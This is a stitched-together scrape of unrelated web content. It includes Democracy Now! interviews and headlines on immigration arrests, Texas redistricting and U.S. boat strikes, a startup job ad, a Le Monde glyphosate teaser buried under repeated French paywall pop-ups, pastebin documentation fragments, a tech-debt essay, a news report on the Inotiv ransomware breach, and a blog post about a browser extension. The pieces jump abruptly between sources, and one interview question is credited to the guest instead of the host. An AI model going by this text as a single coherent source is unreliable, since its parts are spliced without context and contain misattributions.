AMY GOODMAN : And can you talk about the people you represent? I mean, I think it’s really important, not only in New Orleans, but around the country. A number of the people being picked up are going to their court hearings. They are following the rules, and they end up being arrested.
HOMERO LÓPEZ: Yeah, the majority of people who are being arrested, the majority of calls that we’re receiving are from folks who have — who are going through the process, whether they be children who originally applied through the Special Immigrant Juvenile status process and are awaiting their ability to apply for residency, whether it’s spouses of U.S. citizens who are going to their interviews and are being picked up, whether it’s people who have immigration court hearings and have filed their applications and are attending the hearings, are going — again, they’re doing it, quote-unquote, “the right way.” And that’s who is being picked up. Those are the folks who are the low-hanging fruit. Those are the folks who are going to be targeted.
There’s a reason that these officers are going to worksites and not necessarily doing in-depth investigations to identify folks that they claim are a danger to the community. Instead, what they’re doing is they’re taking folks out of our community: our neighbors, our friends, our family members. And that’s who they’re detaining and they’re sending into these terrible detention centers in order to try to quickly deport them from the country.
AMY GOODMAN : Homero López, I want to thank you for being with us. Do you have a final comment on the City Council hearing that was held yesterday as mics were turned off on person after person who was calling for ICE -free zones?
HOMERO LÓPEZ: Yeah, we hope that City Council will take a stance. We understand that they don’t necessarily have a ton of power over federal actions, but the point here is about the values that the city stands for and what we are going to demonstrate to our community and to our residents of who we support, what we support and what we stand for in the city.
AMY GOODMAN : Homero López is the legal director of ISLA , the Immigration Services and Legal Advocacy, based in New Orleans, Louisiana.
The original content of this program is licensed under a Creative Commons Attribution-Noncommercial-No Derivative Works 3.0 United States License . Please attribute legal copies of this work to democracynow.org. Some of the work(s) that this program incorporates, however, may be separately licensed. For further information or additional permissions, contact us.
This is a rush transcript. Copy may not be in its final form.
AMY GOODMAN : A major victory for President Trump: The Supreme Court has cleared the way for Texas to use a new congressional map designed to help Republicans pick up as many as five House seats in next year’s midterms. A lower court previously ruled the redistricting map was unconstitutional because it had been racially gerrymandered and would likely dilute the political power of Black and Latino voters.
Supreme Court Justice Elena Kagan wrote in her dissent, quote, “This court’s stay ensures that many Texas citizens, for no good reason, will be placed in electoral districts because of their race. And that result, as this court has pronounced year in and year out, is a violation of the constitution,” Justice Kagan wrote.
For more, we’re joined by Ari Berman, voting rights correspondent for Mother Jones magazine. His new piece is headlined “The Roberts Court Just Helped Trump Rig the Midterms.” Ari is the author of Minority Rule: The Right-Wing Attack on the Will of the People — and the Fight to Resist It .
Ari Berman, welcome back to Democracy Now! Talk about the significance of this Supreme Court decision yesterday. And what exactly was Samuel Alito’s role?
ARI BERMAN : Good morning, Amy, and thank you for having me back on the show.
So, the immediate effect is that Texas will now be able to use a congressional map that has already been found to be racially gerrymandered and could allow Republicans to pick up five new seats in the midterms. And remember, Texas started this whole gerrymandering arms race, where state after state is now redrawing their maps ahead of the midterms, essentially normalizing something that is deeply abnormal.
It was an unsigned majority opinion, but Samuel Alito wrote a concurrence, basically saying that the Texas map was a partisan map, pure and simple. And remember, Amy, the Supreme Court has already laid the groundwork for Texas to do this kind of thing by essentially saying that partisan gerrymandering cannot be reviewed in federal court, no matter how egregious it is. They have blocked racial gerrymandering in the past, but now, essentially, what they’re allowing to do is they’re allowing Texas to camouflage a racial gerrymander as a partisan gerrymander, and they’ve given President Trump a huge victory in his war against American democracy.
AMY GOODMAN : This overturned a lower court ruling. What are the role of the courts now, with the Supreme Court ruling again and again on this?
ARI BERMAN : Well, basically, what the Supreme Court has done is it’s given President Trump the power of a king, and it’s given itself the power of a monarchy, because what happens is lower courts keep striking down things that President Trump and his party do, including Trump appointees to the lower courts — the Texas redistricting map was struck down by a Trump appointee, who found that it was racially gerrymandered to discriminate against Black and Latino voters. What the Roberts Court did was overturn that lower court opinion, just as it’s overturned so many other lower court opinions to rule in favor of Donald Trump and his party.
And one of the most staggering things, Amy, is the fact that the Roberts Court has ruled for President Trump 90% of the time in these shadow docket cases. So, in all of these big issues, whether it’s on voting rights or immigration or presidential powers, lower courts are constraining the president, and the Supreme Court repeatedly is saying that the president and his party are essentially above the law.
AMY GOODMAN : So, you have talked about the Supreme Court in 2019 ruling in a case, ordered that courts should stay out of disputes over partisan gerrymandering. Tell us more about that.
ARI BERMAN : It was really a catastrophic ruling for democracy, because what it said is that no matter how egregiously a state gerrymanders to try to target a political party, that those claims not only can’t be struck down in federal court, they can’t even be reviewed in federal court. And what that has done is it said to the Texases of the world, “You can gerrymander as much as you want, as long as you say that you’re doing it for partisan purposes.”
So, this whole exercise made a complete mockery of democracy, because Texas goes out there and says, “We freely admit that we are drawing these districts to pick up five new Republican seats.” President Trump says, “We’re entitled to five new seats.” Now, that would strike the average American as absurd, the idea that you could just redraw maps mid-decade to give more seats to your party. But the Supreme Court has basically laid the groundwork for that to be OK.
And even though racial gerrymandering, discriminating against Black and Hispanic voters, for example, is unconstitutional, which is what the lower court found in Texas, the Roberts Court continually has allowed Republicans to get away with this kind of racial gerrymandering by allowing them to just claim that it’s partisan gerrymandering. And that’s what happened once again in Texas yesterday.
ARI BERMAN : Where does this leave the Voting Rights Act? And for people, especially young people who, you know, weren’t alive in 1965, explain what it says and its importance then.
ARI BERMAN : The Voting Rights Act is the most important piece of civil rights legislation ever passed by the Congress. It quite literally ended the Jim Crow regime in the South by getting rid of the literacy tests and the poll taxes and all the other suppressive devices that had prevented Black people from being able to register and vote in the South for so many years.
It has been repeatedly gutted by the Roberts Court, which has ruled that states with a long history of discrimination, like Texas, no longer have to approve their voting changes with the federal government. The Roberts Court has made it much harder to strike down laws that discriminate against voters of color. And now they are preparing potentially to gut protections that protect people of color from being able to elect candidates of choice.
And I think the Texas ruling is a bad sign, another bad sign, for the Voting Rights Act, because a lower court found that Texas drew these maps to discriminate against Black and Latino voters, that they specifically targeted districts where Black and Latino voters had elected their candidates of choice. And the Supreme Court said, “No, we’re OK with doing it.” So it was yet another example in which the Supreme Court is choosing to protect white power over the power of Black, Latino, Asian American voters.
AMY GOODMAN : So, where does this leave the other cases? You have California’s Prop 50 to redraw the state’s congressional districts, but that was done another way. It was done by a referendum. The people of California voted on it. And then you’ve got North Carolina. You’ve got Missouri. Where does this leave everything before next midterm elections?
ARI BERMAN : Yeah, there’s a lot of activity in the courts so far. A federal court has already upheld North Carolina’s map, which was specifically targeted to dismantle a district of a Black Democrat there. The only district they changed was held by a Black Democrat in the state. In Missouri right now, organizers are trying to get signatures for a referendum to be able to block that district, which also targeted the district of a Black Democrat, Emanuel Cleaver.
California’s law is being challenged by Republicans and by the Justice Department. The Supreme Court did signal, however, in its decision in Texas that they believe that the California map was also a partisan gerrymander, so that that would lead one to believe that if the Supreme Court is going to uphold the Texas map, they would also uphold the California map.
And we’ve also seen repeatedly that there’s double standards for this court, that they allow Republicans to get away with things that they don’t allow Democrats to get away with. They’ve allowed Trump to get away with things that they did not allow Biden to get away with. But generally speaking, it seems like the Supreme Court is going to allow states to gerrymander as much as they want. And that’s going to lead to a situation where American democracy is going to become more rigged and less fair.
AMY GOODMAN : Ari Berman, voting rights correspondent for Mother Jones magazine, author of Minority Rule: The Right-Wing Attack on the Will of the People — and the Fight to Resist It . We’ll link to your piece , “The Roberts Court Just Helped Trump Rig the Midterms.”
Next up, immigration crackdowns continue nationwide. We’ll go to New Orleans, where agents are expected to make 5,000 arrests, and to Minneapolis, as Trump escalates his attacks on the Somali community there, calling the whole community “garbage.” Stay with us.
[break]
AMY GOODMAN : “Ounadikom,” “I Call Out to You,” composed by Ahmad Kaabour at the outbreak of the Lebanese Civil War in 1975 and performed at a Gaza benefit concert on Wednesday by the NYC Palestinian Youth Choir.
The original content of this program is licensed under a Creative Commons Attribution-Noncommercial-No Derivative Works 3.0 United States License . Please attribute legal copies of this work to democracynow.org. Some of the work(s) that this program incorporates, however, may be separately licensed. For further information or additional permissions, contact us.
$120K - $200K • 0.25% - 1.00% • New York, NY, US
Role
Engineering, Full stack
Connect directly with founders of the best YC-funded startups.
Emerge Career’s mission is to break the cycle of poverty and incarceration. We’re not just building software; we’re creating pathways to real second chances. Through an all-in-one platform deeply embedded within the criminal justice system, we recruit, train, and place justice-impacted individuals into life-changing careers.
Our vision is to become the country’s unified workforce development system, replacing disconnected brick-and-mortar job centers with one integrated, tech-powered solution that meets low-income individuals exactly where they are. Today, the federal government spends billions annually on education and training programs, yet only about 70% of participants graduate, just 38.6% secure training-related employment, and average first-year earnings hover around $34,708.
By contrast, our seven-person team has already outperformed the job centers in two entire states (Vermont and South Dakota) in just the past year. With an 89% graduation rate and 92% of graduates securing training-related employment, our alumni aren’t just getting jobs—they’re launching new lives with average first-year earnings of $77,352. The results speak for themselves, and we’re just getting started.
Before Emerge, our founders Zo and Gabe co-founded Ameelio, an award-winning tech nonprofit that is dismantling the prison communication duopoly. Backed by tech luminaries like Reid Hoffman, Vinod Khosla, and Jack Dorsey, and by major criminal-justice philanthropies such as Arnold Ventures and the Mellon Foundation, Ameelio became a recognized leader in the space. Because of this experience both Zo and Gabe understood what it took to create change from within the system. After serving over 1M people impacted by incarceration, they witnessed firsthand the gap in second-chance opportunities and the chronic unemployment plaguing those impacted by the justice system. Emerge Career is committed to solving this issue.
Our students are at the heart of our work. Their journeys have captured national attention on CBS , NBC , and in The Boston Globe , and our programs now serve entire states and cities . And we’re not doing it alone: our vision has attracted support from Alexis Ohanian (776), Michael Seibel, Y Combinator, the Opportunity Fund, and public figures like Diana Taurasi, Deandre Ayton, and Marshawn Lynch. All of us believe that, with the right mix of technology and hands-on practice, we can redefine workforce development and deliver true second chances at scale.
Emerge Career was designed to tackle two systemic issues: recidivism, fueled by post-incarceration unemployment and poverty, and labor shortages in key industries. Over 60% of formerly incarcerated people remain unemployed a year after incarceration , seeking work but not finding it. The reality is shocking, workforce development programs are severely limited inside prison, with only one-third of incarcerated people ever participating . To worsen, the available prison jobs offer meager wages, often less than $1 per hour , and often do not equip individuals with the skills for long-term stable employment.
We call this a Founding Design Engineer role—even three years in and with multiple contracts under our belt—for two reasons. First, you’ll be our very first engineer, joining our co-founder, who’s built the entire platform solo to date. Second, our growth is now outpacing our systems, and we can’t keep up on maintenance alone. We’re at a critical juncture: we can either hire someone to simply care for what exists, or we can bring on a talent who believes that, with the right blend of technology and hands-on practice, we can unify the workforce-development system and deliver second chances at true scale. We hope that can be you.
This is not a traditional engineering job. You’ll do high-impact technical work, but just as often you’ll be on the phone with a student, writing documentation, debugging support issues, or figuring out how to turn a one-off solution into a repeatable system. You’ll ship features, talk to users, and fix what’s broken, whether that’s in the product or in the process. You’ll build things that matter, not just things that are asked for.
This role blends engineering, product, support, and program operations. We’re looking for someone who is energized by ownership, obsessed with user outcomes, and excited to work across domains to make things better. If you’re the kind of person who wants to be hands-on with everything—students, code, strategy, and execution—you’ll thrive here.
Bonus Points
Benefits You’ll Receive: link
Start Date: ASAP
A 2000 study that concluded the well-known herbicide glyphosate was safe, widely cited since then, has just been officially disavowed by the journal that published it. The scientists are suspected of having signed a text actually prepared by Monsanto.
Subscribers only
A quarter-century after its publication, one of the most influential research articles on the potential carcinogenicity of glyphosate has been retracted for "several critical issues that are considered to undermine the academic integrity of this article and its conclusions." In a retraction notice dated Friday, November 28, the journal Regulatory Toxicology and Pharmacology announced that the study, published in April 2000 and concluding the herbicide was safe, has been removed from its archives. The disavowal comes 25 years after publication and eight years after thousands of internal Monsanto documents were made public during US court proceedings (the "Monsanto Papers"), revealing that the actual authors of the article were not the listed scientists – Gary M. Williams (New York Medical College), Robert Kroes (Ritox, Utrecht University, Netherlands), and Ian C. Munro (Intertek Cantox, Canada) – but rather Monsanto employees.
Known as "ghostwriting," this practice is considered a form of scientific fraud. It involves companies paying researchers to sign their names to research articles they did not write. The motivation is clear: When a study supports the safety of a pesticide or drug, it appears far more credible if not authored by scientists employed by the company marketing the product.
You have 73.89% of this article left to read. The rest is for subscribers only.
Vous pouvez lire Le Monde sur un seul appareil à la fois
Ce message s’affichera sur l’autre appareil.
Ajouter un compte Découvrir l’offre Famille Découvrir les offres multicomptesParce qu’une autre personne (ou vous) est en train de lire Le Monde avec ce compte sur un autre appareil.
Vous ne pouvez lire Le Monde que sur un seul appareil à la fois (ordinateur, téléphone ou tablette).
Comment ne plus voir ce message ?
En cliquant sur « » et en vous assurant que vous êtes la seule personne à consulter Le Monde avec ce compte.
Vous ignorez qui est l’autre personne ?
Nous vous conseillons de modifier votre mot de passe .
Que se passera-t-il si vous continuez à lire ici ?
Ce message s’affichera sur l’autre appareil. Ce dernier restera connecté avec ce compte.
Y a-t-il d’autres limites ?
Non. Vous pouvez vous connecter avec votre compte sur autant d’appareils que vous le souhaitez, mais en les utilisant à des moments différents.
Parce qu’une autre personne (ou vous) est en train de lire Le Monde avec ce compte sur un autre appareil.
Vous ne pouvez lire Le Monde que sur un seul appareil à la fois (ordinateur, téléphone ou tablette).
Comment ne plus voir ce message ?
Si vous utilisez ce compte à plusieurs, créez un compte pour votre proche (inclus dans votre abonnement). Puis connectez-vous chacun avec vos identifiants. Sinon, cliquez sur « » et assurez-vous que vous êtes la seule personne à consulter Le Monde avec ce compte.
Vous ignorez qui d’autre utilise ces identifiants ?
Nous vous conseillons de modifier votre mot de passe .
Que se passera-t-il si vous continuez à lire ici ?
Ce message s’affichera sur l’autre appareil. Ce dernier restera connecté avec ce compte.
Y a-t-il d’autres limites ?
Non. Vous pouvez vous connecter avec votre compte sur autant d’appareils que vous le souhaitez, mais en les utilisant à des moments différents.
Parce qu’une autre personne (ou vous) est en train de lire Le Monde avec ce compte sur un autre appareil.
Vous ne pouvez lire Le Monde que sur un seul appareil à la fois (ordinateur, téléphone ou tablette).
Comment ne plus voir ce message ?
Si vous êtes bénéficiaire de l’abonnement, connectez-vous avec vos identifiants. Si vous êtes 3 ou plus à utiliser l’abonnement, passez à l’offre Famille . Sinon, cliquez sur « » et assurez-vous que vous êtes la seule personne à consulter Le Monde avec ce compte.
Vous ignorez qui d’autre utilise ces identifiants ?
Nous vous conseillons de modifier votre mot de passe .
Que se passera-t-il si vous continuez à lire ici ?
Ce message s’affichera sur l’autre appareil. Ce dernier restera connecté avec ce compte.
Y a-t-il d’autres limites ?
Non. Vous pouvez vous connecter avec votre compte sur autant d’appareils que vous le souhaitez, mais en les utilisant à des moments différents.
Parce qu’une autre personne (ou vous) est en train de lire Le Monde avec ce compte sur un autre appareil.
Vous ne pouvez lire Le Monde que sur un seul appareil à la fois (ordinateur, téléphone ou tablette).
Comment ne plus voir ce message ?
Si vous êtes bénéficiaire de l’abonnement, connectez-vous avec vos identifiants. Sinon, cliquez sur « » et assurez-vous que vous êtes la seule personne à consulter Le Monde avec ce compte.
Vous ignorez qui d’autre utilise ce compte ?
Nous vous conseillons de modifier votre mot de passe .
Que se passera-t-il si vous continuez à lire ici ?
Ce message s’affichera sur l’autre appareil. Ce dernier restera connecté avec ce compte.
Y a-t-il d’autres limites ?
Non. Vous pouvez vous connecter avec votre compte sur autant d’appareils que vous le souhaitez, mais en les utilisant à des moments différents.
Parce qu’une autre personne (ou vous) est en train de lire Le Monde avec ce compte sur un autre appareil.
Vous ne pouvez lire Le Monde que sur un seul appareil à la fois (ordinateur, téléphone ou tablette).
Comment ne plus voir ce message ?
Si vous utilisez ce compte à plusieurs, passez à une offre multicomptes pour faire profiter vos proches de votre abonnement avec leur propre compte. Sinon, cliquez sur « » et assurez-vous que vous êtes la seule personne à consulter Le Monde avec ce compte.
Vous ignorez qui d’autre utilise ce compte ?
Nous vous conseillons de modifier votre mot de passe .
Que se passera-t-il si vous continuez à lire ici ?
Ce message s’affichera sur l’autre appareil. Ce dernier restera connecté avec ce compte.
Y a-t-il d’autres limites ?
Non. Vous pouvez vous connecter avec votre compte sur autant d’appareils que vous le souhaitez, mais en les utilisant à des moments différents.
Parce qu’une autre personne (ou vous) est en train de lire Le Monde avec ce compte sur un autre appareil.
Vous ne pouvez lire Le Monde que sur un seul appareil à la fois (ordinateur, téléphone ou tablette).
Comment ne plus voir ce message ?
En cliquant sur « » et en vous assurant que vous êtes la seule personne à consulter Le Monde avec ce compte.
Que se passera-t-il si vous continuez à lire ici ?
Ce message s’affichera sur l’autre appareil. Ce dernier restera connecté avec ce compte.
Y a-t-il d’autres limites ?
Non. Vous pouvez vous connecter avec votre compte sur autant d’appareils que vous le souhaitez, mais en les utilisant à des moments différents.
Vous ignorez qui est l’autre personne ?
Nous vous conseillons de modifier votre mot de passe .
Lecture restreinte
Votre abonnement n’autorise pas la lecture de cet article
Pour plus d’informations, merci de contacter notre service commercial.
# API Reference
## Authentication
All write operations require a Bearer token:
```
Authorization: Bearer YOUR_AUTH_KEY
```
## Endpoints
### Create Paste
POST /api
#### JSON Request
```bash
curl
05_api.md
10 hours ago
# CLI Reference
## Installation
```bash
npm install -g @pbnjs/cli
```
## Configuration
Run the setup wizard:
```bash
pbnj --init
```
This creates ~/.pbnj with your configuration:
```
PBNJ_HOST=ht
04_cli.md
10 hours ago
# Cost Breakdown
"This is deployed on Cloudflare, they might charge us eventually!"
Don't worry. Let's do the math.
## Cloudflare D1 Free Tier
- 500 MB storage
- 5 million reads/day
- 100,000 writ
03_cost.md
10 hours ago
# Deployment Guide
## One-Click Deploy (Recommended)
Click the "Deploy to Cloudflare" button on the GitHub repo — that's it!
The deploy button automatically:
- Forks the repo to your GitHub account
02_deployment.md
10 hours ago
# Welcome to pbnj
pbnj is a simple, minimal self-hosted pastebin solution.
## What is pbnj?
pbnj lets you share code snippets and text files with a simple URL.
No accounts, no bloat - just paste an
01_welcome.md
10 hours ago
# Web Interface
pbnj includes a web interface for creating and managing pastes directly from your browser.
## Authentication
The web interface uses the same `AUTH_KEY` as the CLI and API. Authentic
07_web_interface.md
9 hours ago
# Configuration
pbnj is configured through a single `pbnj.config.js` file in the project root.
## Default Configuration
```js
export default {
name: 'pbnj',
logo: '/logo.png',
idStyle: 'sandw
06_configuration.md
9 hours ago
I once worked at a company which had an enormous amount of technical debt - millions of lines of code, no unit tests, based on frameworks that were well over a decade out of date. On one specific project, we had a market need to get some Windows-only modules running on Linux, and rather than cross-compiling, another team had simply copied & pasted a few hundred thousand lines of code, swapping Windows-specific components for Linux-specific.
For the non-technical reader, this is an enormous problem because now two versions of the code exist. So, all features & bug fixes must be solved in two separate codebases that will grow apart over time. When I heard about this, a young & naive version of me set out to fix the situation....
Tech debt projects are always a hard sell to management, because even if everything goes flawlessly, the code just does roughly what it did before. This project was no exception, and the optics weren't great. I did as many engineers do and "ignored the politics", put my head down, and got it done. But, the project went long, and I lost a lot of clout in the process.
I realized I was essentially trying to solve a people problem with a technical solution. Most of the developers at this company were happy doing the same thing today that they did yesterday...and five years ago. As Andrew Harmel-Law points out, code tends to follow the personalities of the people that wrote it. The code was calcified because the developers were also. Personality types who dislike change tend not to design their code with future change in mind.
Most technical problems are really people problems. Think about it. Why does technical debt exist? Because requirements weren't properly clarified before work began. Because a salesperson promised an unrealistic deadline to a customer. Because a developer chose an outdated technology because it was comfortable. Because management was too reactive and cancelled a project mid-flight. Because someone's ego wouldn't let them see a better way of doing things.
The core issue with the project was that admitting the need for refactoring was also to admit that the way the company was building software was broken and that individual skillsets were sorely out of date. My small team was trying to fix one module of many, while other developers were writing code as they had been for decades. I had one developer openly tell me, "I don't want to learn anything new." I realized that you'll never clean up tech debt faster than others create it. It is like triage in an emergency room, you must stop the bleeding first , then you can fix whatever is broken.
The project also disabused me of the engineer's ideal of a world in which engineering problems can be solved in a vacuum - staying out of "politics" and letting the work speak for itself - a world where deadlines don't exist...and let's be honest, neither do customers. This ideal world rarely exists. The vast majority of projects have non-technical stakeholders, and telling them "just trust me; we're working on it" doesn't cut it. I realized that the perception that your team is getting a lot done is just as important as getting a lot done.
Non-technical people do not intuitively understand the level of effort required or the need for tech debt cleanup; it must be communicated effectively by engineering - in both initial estimates & project updates. Unless leadership has an engineering background, the value of the technical debt work likely needs to be quantified and shown as business value.
Perhaps these are the lessons that prep one for more senior positions. In my opinion, anyone above senior engineer level needs to know how to collaborate cross-functionally, regardless of whether they choose a technical or management track. Schools teach Computer Science, not navigating personalities, egos, and personal blindspots.
I have worked with some incredible engineers, better than myself - the type that have deep technical knowledge on just about any technology you bring up. When I was younger, I wanted to be that engineer - the "engineer's engineer". But I realize now, that is not my personality. I'm too ADD for that. :)
For all of their (considerable) strengths, more often than not, those engineers shy away from the interpersonal. The tragedy is that they are incredibly productive ICs, but may fail with bigger initiatives because they are only one person - a single processor core can only go so fast. Perhaps equally valuable is the "heads up coder" - the person who is deeply technical, but also able to pick their head up & see project risks coming (technical & otherwise) and steer the team around them.
American pharmaceutical firm Inotiv is notifying thousands of people that they're personal information was stolen in an August 2025 ransomware attack.
Inotiv is an Indiana-based contract research organization specializing in drug development, discovery, and safety assessment, as well as live-animal research modeling. The company has about 2,000 employees and an annual revenue exceeding $500 million.
When it disclosed the incident, Inotiv said that the attack had disrupted business operations after some of its networks and systems (including databases and internal applications) were taken down.
Earlier this week, the company revealed in a filing with the U.S. Securities and Exchange Commission (SEC) that it has "restored availability and access" to impacted networks and systems and that it's now sending data breach notifications to 9,542 individuals whose data was stolen in the August ransomware attack.
"Our investigation determined that between approximately August 5-8, 2025, a threat actor gained unauthorized access to Inotiv's systems and may have acquired certain data," it says in letter samples filed with Maine's attorney general .
"Inotiv maintains certain data related to current and former employees of Inotiv and their family members, as well as certain data related to other individuals who have interacted with Inotiv or companies it has acquired."
Inotiv has not yet shared which types of data were stolen during the incident, nor has it attributed the attack to a specific cybercrime operation.
However, the Qilin ransomware group claimed responsibility for the breach in August, leaked data samples allegedly stolen from the company's compromised systems, and said they exfiltrated over 162,000 files totaling 176 GB.
An Inotiv spokesperson has not yet responded to BleepingComputer's request for comment regarding the validity of Qilin ransomware's claims.
Qilin surfaced in August 2022 as a Ransomware-as-a-Service (RaaS) operation under the "Agenda" name and has since claimed responsibility for over 300 victims on its dark web leak site.
Qilin ransomware's list of victims includes high-profile organizations such as automotive giant Yangfeng , Australia's Court Services Victoria , publishing giant Lee Enterprises , and pathology services provider Synnovis .
The Synnovis incident affected several major NHS hospitals in London, forcing them to cancel hundreds of appointments and operations .
Broken IAM isn't just an IT problem - the impact ripples across your whole business.
This practical guide covers why traditional IAM practices fail to keep up with modern demands, examples of what "good" IAM looks like, and a simple checklist for building a scalable strategy.
I don't like RSS readers. I know, this is blasphemous especially on a website where I'm actively encouraging you to subscribe through RSS. As someone writing stuff, RSS is great for me. I don't have to think about it, the requests are pretty light weight, I don't need to think about your personal data or what client you are using. So as a protocol RSS is great, no notes.
However as something I'm going to consume, it's frankly a giant chore . I feel pressured by RSS readers, where there is this endlessly growing backlog of things I haven't read. I rarely want to read all of a websites content from beginning to end, instead I like to jump between them. I also don't really care if the content is chronological, like an old post about something interesting isn't less compelling to me than a newer post.
What I want, as a user experience, is something akin to TikTok. The whole appeal of TikTok, for those who haven't wasted hours of their lives on it, is that I get served content based on an algorithm that determines what I might think is useful or fun. However what I would like is to go through content from random small websites. I want to sit somewhere and passively consume random small creators content, then upvote some of that content and the service should show that more often to other users. That's it. No advertising, no collecting tons of user data about me, just a very simple "I have 15 minutes to kill before the next meeting, show me some random stuff."
In this case the "algorithm" is pretty simple: if more people like a thing, more people see it. But with Google on its way to replacing search results with LLM generated content, I just wanted to have something that let me play around with the small web the way that I used to.
There actually used to be a service like this called StumbleUpon which was more focused on pushing users towards popular sites. It has been taken down, presumably because there was no money in a browser plugin that sent users to other websites whose advertising you didn't control.
You can go download the Firefox extension now and try this out and skip the rest of this if you want. https://timewasterpro.xyz/ If you hate it or find problems, let me know on Mastodon. https://c.im/@matdevdug
So I wanted to do something pretty basic. You hit a button, get served a new website. If you like the website, upvote it, otherwise downvote it. If you think it has objectionable content then hit report. You have to make an account (because I couldn't think of another way to do it) and then if you submit links and other people like it, you climb a Leaderboard.
On the backend I want to (very slowly so I don't cost anyone a bunch of money) crawl a bunch of RSS feeds, stick the pages in a database and then serve them up to users. Then I want to track what sites get upvotes and return those more often to other users so that "high quality" content shows up more often. "High quality" would be defined by the community or just me if I'm the only user.
It's pretty basic stuff, most of it copied from tutorials scattered around the Internet. However I really want to drive home to users that this is not a Serious Thing. I'm not a company, this isn't a new social media network, there are no plans to "grow" this concept beyond the original idea unless people smarter than me ping with me ideas. So I found this amazing CSS library: https://sakofchit.github.io/system.css/
The Apple's System OS design from the late-80s to the early 90s was one of my personal favorites and I think would send a strong signal to a user that this is not a professional, modern service.
Great, the basic layout works. Let's move on!
So I ended up doing FastAPI because it's very easy to write. I didn't want to spend a ton of time writing the API because I doubt I nailed the API design on the first round. I use sqlalchemy for the database. The basic API layout is as follows:
The source for the RSS feeds came from the (very cool) Kagi small web Github. https://github.com/kagisearch/smallweb . Basically I assume that websites that have submitted their RSS feeds here are cool with me (very rarely) checking for new posts and adding them to my database. If you want the same thing as this does, but as an iFrame, that's the Kagi small web service.
The scraping work is straightforward. We make a background worker, they grab 5 feeds every 600 seconds, they check for new content on each feed and then wait until the 600 seconds has elapsed to grab 5 more from the smallweb list of RSS feeds. Since we have a lot of feeds, this ends up look like we're checking for new content less than once a day which is the interval that I want.
Then we write it out to a sqlite database and basically track "has this URL been reported", if so, put it into a review queue and then how many times this URL has been liked or disliked. I considered a "real" database but honestly sqlite is getting more and more scalable every day and its impossible to beat the immediate start up and functionality. Plus very easy to back up to encrypted object storage which is super nice for a hobby project where you might wipe the prod database at any moment.
In terms of user onboarding I ended up doing the "make an account with an email, I send a link to verify the email". I actually hate this flow and I don't really want to know a users email. I never need to contact you and there's not a lot associated with your account, which makes this especially silly. I have a ton of email addresses and no real "purpose" in having them. I'd switch to Login with Apple, which is great from a security perspective but not everybody has an Apple ID.
I also did a passkey version, which worked fine but the OSS passkey handling was pretty rough still and most people seem to be using a commercial service that handled the "do you have the passkey? Great, if not, fall back to email" flow. I don't really want to do a big commercial login service for a hobby application.
Auth is a JWT, which actually was a pain and I regret doing it. I don't know why I keep reaching for JWTs, they're a bad user experience and I should stop.
I'm more than happy to release the source code once I feel like the product is in a somewhat stable shape. I'm still ripping down and rewriting relatively large chunks of it as I find weird behavior I don't like or just decide to do things a different way.
In the end it does seem to do whats on the label. We have over 600,000 individual pages indexed.
Honestly I've been pretty pleased. But there are some problems.
First I couldn't find a reliable way of switching the keyboard shortcuts to be Mac/Windows specific. I found some options for querying platform but they didn't seem to work, so I ended up just hardcoding them as Alt which is not great.
The other issue is that when you are making an extension, you spend a long time working with these manifests.json. The specific part I really wasn't sure about was:
"browser_specific_settings": {
"gecko": {
"id": "[email protected]",
"strict_min_version": "80.0",
"data_collection_permissions": {
"required": ["authenticationInfo"]
}
}
}
I'm not entirely sure if that's all I'm doing? I think so from reading the docs.
Anyway I built this mostly for me. I have no idea if anybody else will enjoy it. But if you are bored I encourage you to give it a try. It should be pretty light weight and straight-forward if you crack open the extension and look at it. I'm not loading any analytics into the extension so basically until people complain about it, I don't really know if its going well or not.
In this age of widespread misinformation and increased threats to press freedom, support for independent journalism is more important than ever. Media is essential to the functioning of a democratic society. Please donate today, so we can keep delivering urgent reporting on the world’s most pressing issues.
Every dollar makes a difference. Thank you so much!
Democracy Now!
Amy Goodman
We rely on contributions from you, our viewers and listeners to do our work. If you visit us daily or weekly or even just once a month, now is a great time to make your monthly contribution.
Please do your part today.
Donate
Independent Global News
Watch Headlines
Dec 05, 2025
The Pentagon has announced the U.S. blew up another boat in the eastern Pacific, killing four people. The Pentagon claimed the boat was carrying drugs but once again offered no proof. The U.S. has now killed at least 87 people in 22 strikes on boats since September. This comes as controversy continues to grow over a September 2 strike, when the U.S. targeted and killed two men who had survived an initial attack. Nine people were killed in the first strike. On Thursday, members of Congress were shown video of two men being killed at a time when they were clinging to the side of their overturned boat. Democratic Representative Jim Himes of Connecticut spoke after watching the video.
Rep. Jim Himes : “What I saw in that room was one of the most troubling things I’ve seen in my time in public service. You have two individuals in clear distress without any means of locomotion, with a destroyed vessel, who are killed by the United States.”
Lawmakers also questioned Admiral Frank “Mitch” Bradley, the operation’s commanding officer. Many questions remain over Defense Secretary Pete Hegseth’s role. The Washington Post recently reported Hegseth had ordered Pentagon officials to “kill everybody” on the boat.
Dec 05, 2025
The Pentagon’s inspector general has released its report examining Hegseth’s sharing of sensitive information about U.S. strikes in Yemen on a Signal group chat earlier this year. The report found Hegseth’s actions “created a risk to operational security that could have resulted in failed U.S. mission objectives and potential harm to U.S. pilots.” The report also criticized Hegseth’s use of a personal cellphone to conduct official business. Hegseth himself refused to cooperate with the investigation, refusing to hand over his phone or sit for an interview.
Dec 05, 2025
Israel’s military is continuing to pound the Gaza Strip in violation of the October 10 ceasefire agreement. Al Jazeera reports Israeli ships opened fire toward the coast of Khan Younis, while air raids struck the city of Rafah. There are reports of explosions and Israeli artillery fire around Gaza City, including airstrikes near the Maghazi refugee camp.
Meanwhile, a CNN investigation has found the Israeli military fired indiscriminately at starving Palestinians collecting sacks of flour near an aid distribution site near the Zikim crossing in June, then bulldozed their bodies into shallow, unmarked graves, with some bodies left to decompose or be partially eaten by dogs. Gaza officials and the United Nations estimate about 10,000 Palestinians remain missing from Israel’s more than two-year assault, while the official death toll recently passed 70,000.
Dec 05, 2025
Image Credit: 'The Rising Star' Keshet 12
Public broadcasters in Ireland, Slovenia, the Netherlands and Spain said Thursday they will boycott the 2026 Eurovision Song Contest, after the European Broadcasting Union refused to hold a vote on whether to exclude Israel. This is José Pablo López, president of Spain’s national broadcaster.
José Pablo López : “We maintain the same position we had months ago when we said Israel’s participation in the Eurovision festival was untenable for two main reasons, firstly because the genocide it has perpetuated in Gaza. As president of the corporation, I keep thinking that Eurovision is a contest, but human rights are not a contest.”
Eurovision is among the most popular TV and online events in the world; last year, viewers from 156 countries cast votes for their favorite contestants.
Dec 05, 2025
